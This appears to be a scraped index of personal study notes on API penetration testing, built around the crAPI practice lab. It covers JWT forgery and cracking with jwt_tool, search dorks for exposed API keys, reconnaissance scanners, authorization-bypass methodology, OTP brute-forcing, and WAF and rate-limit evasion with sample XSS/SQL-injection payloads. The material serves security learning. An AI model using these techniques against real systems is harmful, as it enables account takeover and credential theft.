              Two tools: jwt.io and jwt_tools.

              To see a jwt decoded on your CLI:

              jwt_tool eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk\n1NDgyOTl9.yeyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk121Lj2Doa7rA9oUQk1Px7b2hUCMQJeyCsGYLbJ8hZMWc7304aX_hfkLB__1o2YfU49VajMBhhRVP_OYNafttug \n

              Result:

              Also, to see the decoded jwt, knowing that is encoded in base64, we could echo each of its parts:

              echo eyJhbGciOiJIUzUxMiJ9 | base64 -d  && echo eyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0\nIjoxNjY5NDYxODk5LCJleHAiOjE2Njk1NDgyOTl9 | base64 -d\n

              Results:

              {\"alg\":\"HS512\"}{\"sub\":\"hapihacker@hapihacher.com\",\"iat\":1669461899,\"exp\":1669548299} \n

              To run a JWT scan with jwt_tool, run:

              jwt_tool -t <http://target-site.com/> -rh \"<Header>: <JWT_Token>\" -M pb\n# in the target site specify a path that leverages a call to a token\n# replace Header with the name of the Header and JWT_Tocker with the actual token.\n# -M: Scanning mode. 'pb' is playbook audit. 'er': fuzz existing claims to force errors. 'cc': fuzz common claims. 'at': All tests.\n

              Example:

              Some more jwt_tool flags that may come in hand:

              # -X EXPLOIT, --exploit EXPLOIT\n#                        eXploit known vulnerabilities:\n#                        a = alg:none\n#                        n = null signature\n#                        b = blank password accepted in signature\n#                        s = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)\n#                        k = key confusion (specify public key with -pk)\n#                        i = inject inline JWKS\n
              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#1-the-none-attack","title":"1. The none attack","text":"

              A JWT with \"none\" as its algorithm is a free ticket. Modify user and become admin, root,... Also, in poorly implemented JWT, sometimes user and password can be found in the payload.

              To craft a jwt with \"none\" as the value for \"alg\", run:

              jwt_tool <JWT_Token> -X a\n
              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#2-the-null-signature-attack","title":"2. The null signature attack","text":"

              Second attack in this section is removing the signature from the token. This can be done by erasing the signature altogether and leaving the last period in place.

              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#the-blank-password-accepted-in-signature","title":"The blank password accepted in signature","text":"

              Launching this attack is relatively simple. Just remove the password value from the payload and leave it in blank. Then, regenerate the jwt.

              Also, with jwt_tool, run:

              jwt_tool <JWT_Token> -X b\n
              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#3-the-algorithm-switch-or-key-confusion-attack","title":"3. The algorithm switch (or key-confusion) attack","text":"

              A more likely scenario than the provider accepting no algorithm is that they accept multiple algorithms. For example, if the provider uses RS256 but doesn\u2019t limit the acceptable algorithm values, we could alter the algorithm to HS256. This is useful, as RS256 is an asymmetric encryption scheme, meaning we need both the provider\u2019s private key and a public key in order to accurately hash the JWT signature. Meanwhile, HS256 is symmetric encryption, so only one key is used for both the signature and verification of the token. If you can discover the provider\u2019s RS256 public key and then switch the algorithm from RS256 to HS256, there is a chance you may be able to leverage the RS256 public key as the HS256 key.

              jwt_tool <JWT_Token> -X k -pk public-key.pem\n# You will need to save the captured public key as a file on your attacking machine.\n
              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#4-the-jwt-crack-attack","title":"4. The jwt crack attack","text":"

              JWT_Tool can still test 12 million passwords in under a minute. To perform a JWT Crack attack using JWT_Tool, use the following command:

              jwt_tool <JWT Token> -C -d /wordlist.txt\n# -C indicates that you are conducting a hash crack attack\n# -d specifies the dictionary or wordlist\n

              Once you crack the secret of the signature, we can create our own trusted tokens. 1. Grab another user email (in the crapi app, from the data exposure vulnerability when getting the forum (GET {{baseUrl}}/community/api/v2/community/posts/recent). 2. Generate a token with the secret.

              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#5-spoofing-jws","title":"5. Spoofing JWS","text":"

              Specify JWS URL with -ju, or set in jwtconf.ini to automate this attack.

              ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/","title":"Api Reconnaissance","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups
              ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#passive-reconnaissance","title":"Passive reconnaissance","text":"","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#google-dorks","title":"Google Dorks","text":"

              More about google dorks.

              Google Dorking Query Expected results intitle:\"api\" site: \"example.com\" Finds all publicly available API related content in a given hostname. Another cool example for API versions: inurl:\"/api/v1\" site: \"example.com\" intitle:\"json\" site: \"example.com\" Many APIs use json, so this might be a cool filter inurl:\"/wp-son/wp/v2/users\" Finds all publicly available WordPress API user directories. intitle:\"index.of\" intext:\"api.txt\" Finds publicly available API key files. inurl:\"/api/v1\" intext:\"index of /\" Finds potentially interesting API directories. intitle:\"index of\" api_key OR \"api key\" OR apiKey -pool This is one of my favorite queries. It lists potentially exposed API keys.","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#github","title":"Github","text":"

              More Githun Dorking.

              Also Github can be a good platform to search for overshared information relating to APIs.

              Github Dowking Query Expected results applicationName api key After getting results, filter by issue and you may find some api keys. It's common to leave api keys exposed when rebasing a git repo, for instance api_key - authorization_bearer - oauth - auth - authentication - client_secret - api_token - client_id - OTP - HOMEBREW_GITHUB_API_TOKEN - SF_USERNAME - HEROKU_API_KEY - JEKYLL_GITHUB_TOKEN - api.forecast.io - password - user_password - user_pass - passcode - client_secret - secret - password hash - user auth - extension: json nasa Results show some extensions that include json, so they might be API related shodan_api_key Results show shodan api keys \"authorization: Bearer\" This search reveal some authorization token. filename: swagger.json Go to Code tab and you will have the swagger file.","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#shodan","title":"Shodan","text":"Shodan Dowking Query Expected results \"content-type: application/json\" This type of content is usually related to APIs \"wp-json\" If you are using wordpress","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#waybackmachine","title":"WaybackMachine","text":"Waybackmachine Dowking Query Expected results Path to a API We are trying to see is there is a recorded history of the API. It may provide us with endpoints that used to exist but allegedly not anymore.","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#active-reconnaissance","title":"Active reconnaissance","text":"","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#nmap","title":"nmap","text":"

              Nmap Cheat sheet.

              First, we do a service enumeration. The Nmap general detection scan uses default scripts (-sC) and service enumeration (-sV) against a target and then saves the output in three formats for later review (-oX for XML, -oN for Nmap, -oG for greppable, or -oA for all three):

              nmap -sC -sV [target address or network range] -oA nameofoutput\n

              The Nmap all-port scan will quickly check all 65,535 TCP ports for running services, application versions, and host operating system in use:

              nmap -p- [target address] -oA allportscan\n

              You\u2019ll most likely discover APIs by looking at the results related to HTTP traffic and other indications of web servers. Typically, you\u2019ll find these running on ports 80 and 443, but an API can be hosted on all sorts of different ports. Once you discover a web server, you can perform HTTP enumeration using a Nmap NSE script (use -p to specify which ports you'd like to test).

              nmap -sV --script=http-enum $ip -p 80,443,8000,8080\n
              ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#amass","title":"amass","text":"

              amass Cheat sheet.

              Before diving into using Amass, we should make the most of it by adding API keys to it.

              1. First, we can see which data sources are available for Amass (paid and free) by running:

              amass enum -list \n

              2. Next, we will need to create a config file to add our API keys to.

              sudo curl https://raw.githubusercontent.com/OWASP/Amass/master/examples/config.ini >~/.config/amass/config.ini\n

              3. Now, see the file ~/.config/amass/config.ini and register in as many services as you can. Once you have obtained your API ID and Secret, edit the config.ini file and add the credentials to the file.

              sudo nano ~/.config/amass/config.ini\n

              4. Now, edit the file to add the sources. It is recommended to add:

              • censys.io: guesswork out of understanding and protecting your organization\u2019s digital footprint.
              • https://asnlookup.com: Quickly lookup updated information about specific Autonomous System Number (ASN), Organization, CIDR, or registered IP addresses (IPv4 and IPv6) among other relevant data. We also offer a free and paid API access!
              • https://otx.alienvault.com: Quickly identify if your endpoints have been compromised in major cyber attacks using OTX Endpoint Security and many other.
              • https://bigdatacloud.com
              • https://cloudflare.com
              • https://www.digicert.com/tls-ssl/certcentral-tls-ssl-manager:
              • https://fullhunt.io
              • https://github.com
              • https://ipdata.co
              • https://leakix.net
              • as many more as you can.

              5. When ready, we can run amass:

              amass enum -active -d crapi.apisec.ai  \n

              Also, to be more precise:

              amass enum -active -d <target> | grep api\n# amass enum -active -d microsoft.com | grep api\n

              Amass has several useful command-line options. Use the intel command to collect SSL certificates, search reverse Whois records, and find ASN IDs associated with your target. Start by providing the command with target IP addresses

              amass intel -addr [target IP addresses]\n

              If this scan is successful, it will provide you with domain names. These domains can then be passed to intel with the whois option to perform a reverse Whois lookup:

              amass intel -d [target domain] \u2013whois\n

              This could give you a ton of results. Focus on the interesting results that relate to your target organization. Once you have a list of interesting domains, upgrade to the enum subcommand to begin enumerating subdomains. If you specify the -passive option, Amass will refrain from directly interacting with your target:

              amass enum -passive -d [target domain]\n

              The active enum scan will perform much of the same scan as the passive one, but it will add domain name resolution, attempt DNS zone transfers, and grab SSL certificate information:

              amass enum -active -d [target domain]\n

              To up your game, add the -brute option to brute-force subdomains, -w to specify the API_superlist wordlist, and then the -dir option to send the output to the directory of your choice:

              amass enum -active -brute -w /usr/share/wordlists/API_superlist -d [target domain] -dir [directory name]  \n
              ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#gobuster","title":"gobuster","text":"

              gobuster Cheat sheet.

              Great tool to brute force directory discovery but it's not recursive (you need to specify a directory to perform a deeper scanner). Also, dictionaries are not API-specific. But here are some commands for Gobuster:

              gobuster dir -u <exact target url> -w </path/dic.txt> --wildcard -b 401\n# -b flag is to exclude from results an specific http response\n
              ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#kiterunner","title":"Kiterunner","text":"

              kiterunner Cheat sheet.

              Kiterunner is an excellent tool that was developed and released by Assetnote. Kiterunner is currently the best tool available for discovering API endpoints and resources. While directory brute force tools like Gobuster/Dirbuster/ work to discover URL paths, it typically relies on standard HTTP GET requests. Kiterunner will not only use all HTTP request methods common with APIs (GET, POST, PUT, and DELETE) but also mimic common API path structures. In other words, instead of requesting GET /api/v1/user/create, Kiterunner will try POST /api/v1/user/create, mimicking a more realistic request.

              1. First, download the dictionaries from the project. In my case I downloaded it to /usr/share/wordlists/kiterunner/:

              • https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz
              • https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz
              • https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz
              • https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz

              2. Run a quick scan of your target\u2019s URL or IP address like this:

              kr scan HTTP://127.0.0.1 -w ~/api/wordlists/data/kiterunner/routes-large.kite  \n

              But. Note that we conducted this scan without any authorization headers, which the target API likely requires.

              To use a dictionary (and not a kite file):

              kr brute <target> -w ~/api/wordlists/data/automated/nameofwordlist.txt\n

              If you have many targets, you can save a list of line-separated targets as a text file and use that file as the target.

              One of the coolest Kiterunner features is the ability to replay requests. Thus, not only will you have an interesting result to investigate, you will also be able to dissect exactly why that request is interesting. In order to replay a request, copy the entire line of content into Kiterunner, paste it using the kb replay option, and include the wordlist you used:

              kr kb replay \"GET     414 [    183,    7,   8]://192.168.50.35:8888/api/privatisations/count 0cf6841b1e7ac8badc6e237ab300a90ca873d571\" -w ~/api/wordlists/data/kiterunner/routes-large.kite\n

              Running this will replay the request and provide you with the HTTP response.

              To run Kiterunner providing an authorization token as it could be \"x-access-token\", we can take the full authorization token and add it to your Kiterunner scan with the -H option:

              kr scan http://IP -w /path/to/dict.txt -H 'x-access-token: eyJhGcwisdfdsfdfsdfsdfsdfdsfdsfddfdf.eyfakefakefakefaketokenfakeken._wcoooooo_kkkkkk_kkkk'\n
              ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/","title":"Endpoint analysis","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups

              If an API is not documented or the documentation is unavailable to you, then you will need to build out your own collection of requests. Two different methods:

              1. Build a collection in Postman
              2. Build out an API specification using mitmproxy2swagger.
              ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#build-a-collection-in-postman","title":"Build a collection in Postman","text":"

              In the instance where there is no documentation and no specification file, you will have to reverse-engineer the API based on your interactions with it. Mapping an API with several endpoints and a few methods can quickly grow into quite a large attack surface. There are two ways to manually reverse engineer an API with Postman.

              • One way is by constructing each request.
              • The other way is to proxy web traffic through Postman, then use it to capture a stream of requests. This process makes it much easier to construct requests within Postman, but you\u2019ll have to remove or ignore unrelated requests.
              ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#steps","title":"Steps","text":"

              1. Start crAPI applicationi

              cd ~/lab/crapi\nsudo docker-compose start\n

              2. Open the browser, and select \"postman 5555\" in your Foxyproxy addon to proxy the traffic.

              3. Open your local crapi application in the browser: http://localhost:8888

              4. Run postman from the command line:

              postman\n

              5. Once postman is open, press on \"Capture traffic link\" (at the bottom right of the application). Set up the capture, and make sure that proxy is enabled in the application. A useful shortcut to go to Settings is CTRL-, (comma).

              6. Now you are capturing the traffic. Go through your crapi application and when done, go to postman and stop the capture.

              7. Final step is to filter out the requests you want and add them to a collection. In the collection, you will be able to organize these requests in folders /endpoints.

              ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#build-out-an-api-specification-using-mitmproxy2swagger","title":"Build out an API specification using mitmproxy2swagger","text":"","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#steps_1","title":"Steps","text":"

              1. From cli, run:

              mitmweb\n

              2. Select burp 8080 in the foxyproxy addon in your browser.

              3. Open a tab in your browser with the mitmweb proxy service: http://localhost:8081, and make sure that traffic is being captured there.

              4. Now you are capturing the traffic. Go through your crapi application and when done, turn off the foxyproxy.

              5. In the mitmweb service at http://localhost:8081, go to File>Save. A file called \"flows\" will be downloaded to your download folder.

              6. We need to parse this \"flows\" file into something understandable by Postman. For that, we will use a tool called mitmproxy2swagger, which will transform our captured traffic into an Open API 3.0 YAML file that can be viewed in a browser and imported as a collection into Postman. Run:

              sudo mitmproxy2swagger -i ~/Downloads/flows -o spec.yml -p http://localhost:8888/ -f flow \n# -i: input    |  -o: output   | -p: target   |  -f: force format to the specified.\n

              7. Edit spec.yml to remove \"ignore:\" when it proceeds, and save changes .

              Run again mitmproxy2swagger to populate your spec with examples.

              sudo mitmproxy2swagger -i ~/Downloads/flows -o spec.yml -p http://localhost:8888/ -f flow --examples\n# --examples will grab the previously created spec.yml and will populate it with real examples. We do this in two steps to avoid creating examples for request out of scope.  \n

              8. Open https://editor.swagger.io/ and click on File > Import. Import your spec.yml. The goal here is to validate the structure of your file.

              9. If everything is ok, open the postman application:

              postman\n

              10. In postman, go to File > Import, and select the spec.yml file. After importing it, you will be able to add it to a collection, and compare this collection against that created by browsing just with postman.

              ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#data-exposure","title":"Data Exposure","text":"

              Quoting directly from the course: \"When making a request to an endpoint, make sure you note the request\u00a0requirements. Requirements could include some form of authentication, parameters, path variables, headers, and information included in the body of the request. The API documentation should tell you what it requires of you and mention which part of the request that information belongs in. If the documentation provides examples, use them to help you. Typically, you can replace the example values with the ones you\u2019re looking for. The table below describes some of the conventions often used in these examples\".

              ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#api-documentation-conventions","title":"API Documentation Conventions","text":"Convention Example Meaning : or {} /user/:id /user/{id} /user/2727 /account/:username /account/{username} /account/scuttleph1sh The colon or curly brackets are used by some APIs to indicate a path variable. In other words, \u201c:id\u201d represents the variable for an ID number and \u201c{username}\u201d represents the account username you are trying to access. [] /api/v1/user?find=[name] Square brackets indicate that the input is optional. || \u201cblue\u201d || \u201cgreen\u201d || \u201cred\u201d Double bars represent different possible values that can be used.","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/","title":"Evasion and Combining techniques","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups
              Resources
              • w3af
              • WAFW00f
              • waf-bypass.com.
              • hacken.io
              • Awesome WAF.

              Here some basic techniques for evading or bypassing common API security controls.

              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#what-can-trigger-a-waf-web-applicatin-firewall","title":"What can trigger a WAF (Web Applicatin Firewall)?","text":"
              • Too many requests for inexisting resources.
              • To many requests in a short period of time.
              • Common SQL or XSS payloads attackes in requests.
              • Unusual behaviour (like a test for authorizathion vulnerabilities).
              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#how-to-detect-a-waf","title":"How to detect a WAF","text":"

              What can a WAF do provided that RESTful APIs are stateless? They can use attribution to identify an atacker and for that they use: IP address, origin headers, authorization tokens and metadata (patterns of requests, rate of requests and the combination of the headers included in the requests).

              When it comes to Hacking APIs the best approach is first use the API as it was intended. Second, review the API responses for evidence of a WAF (in headers):

              1. Headers such as X-CDN means that the API is leveraging a Content Delivery Network (CDN), which often provides WAFs as a service.

              2. Use Burp Suite's Proxy and Repeater to watch if your requests are being sent to a proxy (302 sending you to a CDN).

              3. Use some tools:

              nmap -p 80 -script http-waf-detect $ip \n

              Also w3af, WAFW00f, and this recollection of handy tools: waf-bypass.com.

              Great article found when searchin for these tools: hacken.io.

              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#techniques-for-evasion","title":"Techniques for evasion","text":"","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#1-burners-accounts","title":"1. Burners accounts","text":"

              So there is a WAF. Before attacking, create several extra accounts (or tokens you can dispose). Watch out! When creating these accounts, make sure you use information not associated to your other accounts:

              - Different names and emails.\n- Different passwords.\n- Use VPN and disguise your IP.\n
              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#2-bypassing-controls-with-string-terminators","title":"2. Bypassing controls with string terminators","text":"

              Simple payloads.

              Null bytes and other combinations of symbols are often interpreted as\u00a0string terminators. When not filtered out they could terminate the API security control filters.

              Here an example of a NULL byte included in a XSS combined with a SQL injection attack.

              POST /api/v1/user/profile/update\n--snip--\n\n     {\n        \u201cusername\u201d: \u201c<%00script>alert(1);</%00script>\u201d\n        \u201cpass\u201d:\u00a0\"%00'OR 1=1\"\n}\n
              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#3-bypassing-controls-with-case-switching","title":"3. Bypassing controls with case switching","text":"

              Case switching the payload may provoke the WAF not detecting the attack.

              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#4-bypassing-controls-by-encoding-payloads","title":"4. Bypassing controls by encoding payloads","text":"

              If you are using Burp Suite, the module Decoder is perfect for quickly encoding or decoding a payload.

              Trick: double encoding your payload.

              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#tools","title":"Tools","text":"","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#1-burpsuite-intruder","title":"1. BurpSuite Intruder","text":"

              Also, once you know which encoding technique is the efective one to bypass the WAF, use BurpSuite Intruder (section Payload processing under the Intruder Payload option) for configuring you attack. Intruder has some more worthy options:

              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#2-wfuzz","title":"2. wfuzz","text":"

              wfuzz Cheat sheet.

              # Check which wfuzz encoders are available\nwfuzz -e encoders\n\n# To use an encoder, add a comma to the payload and specify the encoder name\nwfuzz -z file,path/to/payload.txt,base64 http://hackig-example.com/api/v2/FUZZ\n\n# Using multiple encoders. Each payload will be processed in separated requests.  \nwfuzz -z list,a,base64-md5-none \n# this results in three payloads: one encoded in base64, another in md5 and last with none. \n\n# Each payload will be processed by multiple encoders.\nwfuzz -z file,payload1-payload2,base64@md5@random_upper -u http://hackig-example.com/api/v2/FUZZ\n
              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#testing-rate-limits","title":"Testing rate limits","text":"","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#rate-limits-what-for","title":"Rate limits. What for?","text":"
              • To avoid incurring into adittional costs associated with computing resources.
              • To avoid falling victim to a DoS attack.
              • To monetize.
              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#how-to-know-if-rate-limit-is-in-place","title":"How to know if rate limit is in place","text":"
              • Consult API documentation.
              • Check APIs header (x-rate-limit, x-rate-limit-remaining, retry- after).
              • See response code 429.
              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#techniques","title":"Techniques","text":"

              1. Throttle your scanning

              In wfuzz:

              # Units are specified in seconds\n-s  Specify a time delay between requests.\n-t Specify the concurrent number of connections\n

              In BurpSuite:

              Set up Intruder's Resource Pool to limit the rate (in milliseconds).\n

              2. Bypassing paths

              When altering slightly the URL path, this could cause the API provider to handle the request diferently, potentially bypassing the rate limit.

              • Adding null bytes.
              • Altering the string ramdonly with various upper and lower case letter.
              • Adding meaningless parameters.

              3. Modifying Origin headers

              When the API provider use headers to enforce rate limiting, you could manipulate them:

              • X-Forwarded-For
              • X-Forwarded-Host
              • X-Host
              • X-Originating-IP
              • X-Remote-IP
              • X-Client-IP
              • X-Remote-Addr

              4. Modifying User-agent header

              You can use this dictionary: Seclist.

              ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#rotating-ip-addresses-with-burpsuite","title":"Rotating IP addresses with BurpSuite","text":"

              Add the extension IP Rotate.

              Requirements to install IP Rotate and have it working:

              • Install the tool Boto3.
              pip3 install boto3\n
              • Install the Jython standalone file from https://www.jython.org/download.html.
              • You will need an AWS account in which you can create an IAM user. There is a small cost associated with using the AWS API gateway. After downloading the IAM Services page, click Add Users and create an user account with programmatic access selected. On the \"Set Permissions page\", select \"Attach Existing Policies Directly\". NExt filter policies by searching for \"API\". Select the \"AmazonAPIGatewayAdministrator\" and \"AmazonAPIGatewayInvokeFullAccess\" permissions. Preceed to the review page.. No tags needed. Skip ahead and create the users. Now, download CSV file containing your user's access key.
              • Install IP Rotate
              • Open the IP Rotate Module and copy and paste access key from the user added in IAM service.
              ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/","title":"Exploiting API Authorization","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups
              ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#bola-broken-object-level-authorization","title":"BOLA - Broken Object Level Authorization","text":"

              BOLA vulnerability allows UserA to request UserB's resources.

              ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#methodology","title":"Methodology","text":"
              1. Create a UserA account.
              2. Use the API and discover requests that involve resource IDs as UserA.
              3. Document requests that include resource IDs and should require authorization.
              4. Create a UserB account.
              5. Obtaining a valid UserB token and attempt to access UserA's resources.

              You could also do this by using UserB's resources with a UserA token.

              ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#bfla-broken-function-level-authorization","title":"BFLA - Broken Function Level Authorization","text":"

              BFLA is about UserA requesting to create, update, post or delete object values that belong to UserB.

              • BFLA request with lateral actions. UserA has the same role or privilege level than UserB.
              • BFLA request with escalated actions. UserB has a privilege level and UserA is able to perform actions reserved for UserB.

              Basically, BFLA attacks will consists on testing for various HTTP methods, seeking out actions of other users that you shouldn't be able to perform. Important: being careful with DELETE request.

              ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#methodology_1","title":"Methodology","text":"
              1. Postman. Go through the collection and select requests for resources of UserA. Focus on resources for private information. Focus also on HTTP verbs such as PUT, DELETE, POST.
              2. Swap out your UserA token for UserB's.
              3. Send GET, PUT, POST, and DELETE requests for UserA's resources using Userb's token.
              4. Investigate code 200, 401, and responses with strange lengths.

              BFLA pays special attention to requests that perform authorized actions.

              ","tags":["api"]},{"location":"hackingapis/exploiting-api-authorization/#tools","title":"Tools","text":"
              • Postman: use the collection variables. Create specific collections for attacks.
              • BurpSute: use the Match and Replace functionality (tab PROXY>OPTIONS) to perform a large-scale replacement of a variable like an authorization token.
              ","tags":["api"]},{"location":"hackingapis/improper-assets-management/","title":"Testing for improper assets management","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups

              Testing for improper assets management is all about discovering unsupported and non-production versions of an API.

              ","tags":["api"]},{"location":"hackingapis/improper-assets-management/#finding-api-versions","title":"Finding API versions","text":"

              Paths to check out:

              api.target.com/v3\n/api/v2/accounts\n/api/v3/accounts\n/v2/accounts\n

              API versioning could also be maintained as a header:

              Accept: version=2.0\nAccept api-version=3\n

              In addition versioning could also be set within a query parameter or request body.

              /api/accounts?ver=2\nPOST /api/accounts\n\n{\n\"ver\":1.0,\n\"user\":\"hapihacker\";\n}\n

              The discovery of non-production versions of an API might not be treated with the same security controls as the production version.

              ","tags":["api"]},{"location":"hackingapis/improper-assets-management/#exploiting-non-production-old-and-deprecate-api-versions","title":"Exploiting non-production, old and deprecate api versions","text":"

              We'll use postman. We are assuming that we have build our collection of requests and that we have identify those parameters regarding API version.

              0. On collection, right click and select \"Run Collection\". In the following screen you can unmark those requests that don't need to be run. But, first, define a Test.

              1. Run a test \"Status code: Code is 200\". In your collection options, go to tab Test and select the option that gives you this code:

              pm.test(\"Status code is 200\", function () { pm.response.to.have.status(200); })\n

              2. Run an unauthenticated baseline scan of the crAPI collection with the Collection Runner. Make sure that \"Save Responses\" is checked. Important. Review the results from your unauthenticated baseline scan to have an idea of how the API provider responds to requests using supported production versioning. After that, repeat the same but this time with an Authenticated user, to obtain an authenticated baseline.

              3. Next, use \"Find and Replace\" to turn the collection's current versions into a variable. For that, use Environmental variables.

              4. Run the collection with the variable set to v1, v2, v3, mobile, internal, test, uat..., and check out the different responses.

              In the course, we are using the crAPI app, and by replicating these steps you can spot different code responses for the request {{base_url}}/identity/api/auth/{{var}}/check-otp.\n/v1 received a 404 Not Found\n/v2 received a 500 response\n/v3 received a 500 response\n\nAlso, body response in /v2 is different from body response in /v3: \n\nThe /v2 password reset request responds with the body (left):\n{\"message\":\"Invalid OTP! Please try again..\",\"status\":500}\n\nThe /v3 password reset request responds with the body (right):\n{\"message\":\"ERROR..\",\"status\":500}\n\nThat might be a sign of improper assets management. Going further and testing it, you can discover that /v2 does not have a limitation on the number of times we can guess the OTP. With a four-digit OTP, we should be able to brute force the OTP within 10,000 requests. Since this endpoint manages resetting passwords, in the end this vulnerability allows you to gain control on any account in the system. \n
              ","tags":["api"]},{"location":"hackingapis/injection-attacks/","title":"Injection Attacks","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups

              The art of fuzzing is knowing which payload to send in the right request with the right tool.

              • Right payload can be narrow with reconnaissance.
              • Right requests are those that include user input (+ headers + url paths)
              • Right tool depends on strategy in fuzzing.

              Yes, when fuzzing we need a strategy.

              1. Identify endpoints (those where client input can interact with a database).

              2. Fuzzing and analyzing responses.

              3. Analyze responses:

              - Verbose error message\n- Response code\n- Time in response.\n

              4. Identify technolofy, version, services behind, security controls.

              ","tags":["api"]},{"location":"hackingapis/injection-attacks/#sql-injections","title":"SQL injections","text":"

              More aboyut SQL injectios. | How to perform a manual attack in SQL | Simple payloads | Tools: SQLmap

              ","tags":["api"]},{"location":"hackingapis/injection-attacks/#nosql-injections","title":"NOSQL injections","text":"

              Simple payloads.

              API commonly use NOSQL databases due to the fact that they scale well. These databases have unique structures, modes of querying... Requests will be alike but payloads may vary.

              ","tags":["api"]},{"location":"hackingapis/injection-attacks/#operating-system-command-injection","title":"Operating System Command Injection","text":"

              Simple payloads

              Some common operatiing system commands that are used in Injection attacks:

              • ipconfig
              • dir
              • ver
              • whoami
              • ifconfig
              • ls
              • pwd
              • whoami

              Target:

              • URL query string
              • Requests parameters
              • headers
              • requests that throw verbose error messages

              Techniques:

              • Pairing multiple commands in a single line.
              ","tags":["api"]},{"location":"hackingapis/injection-attacks/#xss-cross-site-scripting","title":"XSS Cross-Site Scripting","text":"

              More about Cross-Site Scripting | Simple payloads

              ","tags":["api"]},{"location":"hackingapis/injection-attacks/#using-wfuff","title":"Using wfuff","text":"

              Having this request:

